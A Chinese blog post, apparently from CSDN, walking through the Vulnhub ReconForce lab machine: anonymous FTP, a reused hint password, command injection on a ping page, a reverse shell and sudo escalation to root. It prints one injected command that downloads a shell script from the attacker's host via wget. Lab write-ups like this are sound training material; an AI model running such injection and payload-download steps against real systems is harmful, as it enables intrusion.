Vulnhub靶机Reconforce渗透

最新推荐文章于 2024-05-07 16:35:55 发布
最新推荐文章于 2024-05-07 16:35:55 发布
阅读量271 收藏 1
点赞数
文章标签: 安全 kali linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xingjinhao123/article/details/114274523
版权

靶机介绍
官方下载地址:http://www.vulnhub.com/entry/hacknos-reconforce-v11,416/
这个靶机有两个flag,难度是中级
在这里插入图片描述
运行环境
靶机:网络设为桥接,IP地址:192.168.1.89
攻击机:同网段下的kali linux,IP地址:192.168.1.37
开始渗透
将靶机运行起来
在这里插入图片描述
获取靶机IP地址
在这里插入图片描述
在这里插入图片描述
扫描端口及其服务
在这里插入图片描述
这里获取了21端口是允许ftp登录的 而且是允许Anonymous登录的
22端口是ssh服务,密钥加密方式是rsa,80端口是apache的web服务
我们这里先尝试使用ftp登录
在这里插入图片描述
这里获取了提示Security@hackNos可能是一个用户名或者密码
查看当前文件夹没有任何东西,而且也没法切换其他目录
开始访问web服务,
在这里插入图片描述
点击TroublesShoot弹出一个登录页面
在这里插入图片描述
尝试弱密码无法登录,最终使用frp提示的Security@hackNos作为admin用户的密码登录成功
在这里插入图片描述
发现是一个命令执行的页面,127.0.0.1可以执行成功
在这里插入图片描述
加上管道符和ls,可以查看当前文件夹下面的内容
在这里插入图片描述
在这里插入图片描述
查看out.php内容,过滤掉了一些特殊字符
在这里插入图片描述
可以执行系统命令就可以使用wget或者curl将反弹shell的php文件或者木马下载到当前的文件夹下
执行 127.0.0.1|wget http://192.168.1.370:8080/shell.php 没有回显任何东西
执行127.0.0.1|ls查看一下
在这里插入图片描述
shell.php下载成功,开启监听,并访问shell.php
在这里插入图片描述
反弹成功,使用python开启一个终端
在这里插入图片描述
查看所有用户
在这里插入图片描述
尝试先提取到recon,查看recon用户的文件,查看Linux版本都没有找到可以利用的信息
最后使用ftp提示的密码,切换到了recon用户
在这里插入图片描述
在recon用户的家目录里面找到了第一个flag
在这里插入图片描述
知道了recon用户的密码,提权就简单很多了,直接使用sudo就可以了
在这里插入图片描述
成功提权到root,切换到root目录,查看最后一个flag
在这里插入图片描述
两个flag都已经找到了,这个靶机也就渗透成功了!

Sword-豪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
vulnhub靶机EVM渗透笔记
liver100day的博客
08-02 1196
文章标题1.环境搭建2.信息收集2.1 主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:EVM IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/ 2.信息收集 2.1 主机发现 我们要进行渗透,首先得知道目标靶机的IP地址,否则将无从做起 arp-scan -l 3.漏洞利用 4.提权 5.总结 ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1442
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 4076
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
vulnhub靶机渗透服务版本
m0_74025111的博客
05-05 306
以上看到21端口的ftp服务的版本号是ProFTPD 1.3.3c 这个服务版本的话是具有漏洞的,我们使用msf这个工具进行渗透一波。使用nmap工具去查看靶机开放的端口即服务版本 nmap -A -sV -p- 192.168.1.109。3.4 设置目标靶机的IP地址:set rhosts 192.168.1.109。跑完之后已经是ROOT的权限了,本次靶机渗透也就到此结束啦!我们还需要设置一个本地的监听地址(kali攻击机的IP)将网卡设置成为桥接模式,攻击机靶机在同一个网段即可。
vulnhub靶机 ReconForce
witwitwiter的博客
09-18 2786
vulnhub靶机 ReconForce 靶机地址hackNos: ReconForce (v1.1) ~ VulnHub 目标为user.txt和root.txt 靶机配置 将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。 渗透测试 使用nmap进行扫描 └─# nmap -p- -sV -sT -T4 192.168.5.132 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 09:
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1038
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 940
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 1027
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2514
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
vulnhub靶机渗透测试DC-2靶机渗透
m0_62008601的博客
04-29 1430
攻击机-kali-IP:192.168.56.102 靶机-dc2-ip:192.168.103 关于我的这两台机子的网络设置在上一篇文章中已经提到,这里就不再叙述。 查找dc-2 的IP arp-scan-l 得到ip为192.168.56.103 扫描开启的端口 nmap -sV -p- 192.168.56.103 此时发现开启了80端口和ssh服务且将ssh服务的端口改成了7744端口(ssh默认端口是:22) 因为开启了80端口,此时我们可以去访问它的web服务 此
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一) 在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sword-豪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值